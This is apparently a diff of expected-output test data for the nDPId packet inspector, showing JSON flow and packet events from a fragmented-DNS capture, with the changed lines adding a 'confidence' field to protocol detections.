+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968018074,"flow_last_seen":1558968018075,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1499,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c06::105","dst_ip":"2001:470:765b::a25:53","src_port":63369,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968031134,"flow_last_seen":1558968031134,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c05::10e","dst_ip":"2001:470:765b::a25:53","src_port":34944,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968019069,"flow_last_seen":1558968019069,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1531,"flow_avg_l4_payload_len":765,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip4","src_ip":"173.194.169.104","dst_ip":"193.24.227.238","src_port":59464,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021026,"flow_last_seen":1558968021027,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1512,"flow_avg_l4_payload_len":756,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip4","src_ip":"74.125.47.136","dst_ip":"193.24.227.238","src_port":59330,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968021013,"flow_last_seen":1558968021014,"flow_idle_time":180000,"flow_min_l4_payload_len":59,"flow_max_l4_payload_len":824,"flow_tot_l4_payload_len":883,"flow_avg_l4_payload_len":441,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:400c:c00::106","dst_ip":"2001:470:765b::a25:53","src_port":54430,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1558968010233,"flow_last_seen":1558968010234,"flow_idle_time":180000,"flow_min_l4_payload_len":58,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1498,"flow_avg_l4_payload_len":749,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2a00:1450:4013:c03::10a","dst_ip":"2001:470:765b::a25:53","src_port":46433,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1559042371783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"ts_msec":1559042371783,"pkt":"CFsOoYNeAAwpfKTLht1gCrtxAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTuhIANQBFzxq5yAEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACJyfIZPEos+4"}
-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042371783,"flow_last_seen":1559042371783,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042371783,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1559042371794,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"ts_msec":1559042371794,"pkt":"AAwpfKTLCFsOoYNeht1gDo22APYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW6EgD2hIi5yIUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYnJ8hk8Siz7hkUeklXO0ZQ\/LRIFOjEc9n"}
-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042371794,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
+00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":21,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042371794,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
 00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00545{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1559042372779,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"ts_msec":1559042372779,"pkt":"CFsOoYNeAAwpfKTLht1gBVO1AEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTgzgANQBFzxq9qQEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACOxvEogaB96P"}
-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042372779,"flow_last_seen":1559042372779,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042372779,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00781{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1559042372791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"ts_msec":1559042372791,"pkt":"AAwpfKTLCFsOoYNeht1gDjr2APYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADWDOAD2QdK9qYUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAY7G8SiBoH3o+7l8juXO0ZRLEjB1nyQ3R8"}
-00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042372791,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
+00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042372791,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1559042373843,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"ts_msec":1559042373843,"pkt":"CFsOoYNeAAwpfKTLht1gAgwqAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTtOwANQBFzxrdhAEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACKUAwuOvHQbi"}
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042373843,"flow_last_seen":1559042373843,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042373843,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00782{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1559042373854,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"ts_msec":1559042373854,"pkt":"AAwpfKTLCFsOoYNeht1gCMIUAPYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW07AD2Jy7dhIUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMyCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMxwFLAaQAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwE4AHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BpAAEAAQAADhAABMEY4+7ATgABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYpQDC468dBuIqFazGXO0ZRcWgFHZl7TCh"}
-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042373854,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
+00822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042373843,"flow_last_seen":1559042373854,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042373854,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46316,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
 00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1559042374827,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":123,"pkt_l4_len":69,"ts_msec":1559042374827,"pkt":"CFsOoYNeAAwpfKTLht1gAgVFAEURQCABBHAfCxawAgwp\/\/58pMsgAQRwdlsAAAAAAAAKJQBTtWgANQBFzxrqAgEgAAEAAAAAAAEIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAQAAKRAAAAAAAAAMAAoACLUmUKpHzEhG"}
-00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00807{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":26,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1559042374827,"flow_last_seen":1559042374827,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"ts_msec":1559042374827,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00783{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1559042374838,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":300,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":300,"pkt_l4_len":246,"ts_msec":1559042374838,"pkt":"AAwpfKTLCFsOoYNeht1gBQOmAPYRPCABBHB2WwAAAAAAAAolAFMgAQRwHwsWsAIMKf\/+fKTLADW1aAD2vA3qAoUAAAEAAQACAAUIZmcyLW1nbXQId2ViZXJsYWICZGUAABwAAcAMABwAAQAAADwAECABBHAfCxawAAAAAAAAAAHAFQACAAEAAAA8AA8DbnMxCHdlYmVyZG5zwB7AFQACAAEAAAA8AAYDbnMywFLATgAcAAEAAA4QABAgAQRwdlsAAAAAAAAKJQBTwGkAHAABAAAOEAAQIAEEcB8LFrAAAAAACiYAU8BOAAEAAQAADhAABMEY4+7AaQABAAEAAA4QAATC9wUOAAApEAAAAAAAABwACgAYtSZQqkfMSEY\/2z8HXO0ZRm3ax03ipZX3"}
-00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1559042374827,"flow_last_seen":1559042374838,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1559042374838,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":46440,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"fg2-mgmt.weberlab.de","num_queries":1,"num_answers":8,"reply_code":0,"query_type":28,"rsp_type":28,"rsp_addr":"32.1.4.112"}}
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042371783,"flow_last_seen":1559042371794,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":47634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":28,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1559042372779,"flow_last_seen":1559042372791,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":299,"flow_avg_l4_payload_len":149,"midstream":0,"ts_msec":1560869882430,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":33592,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
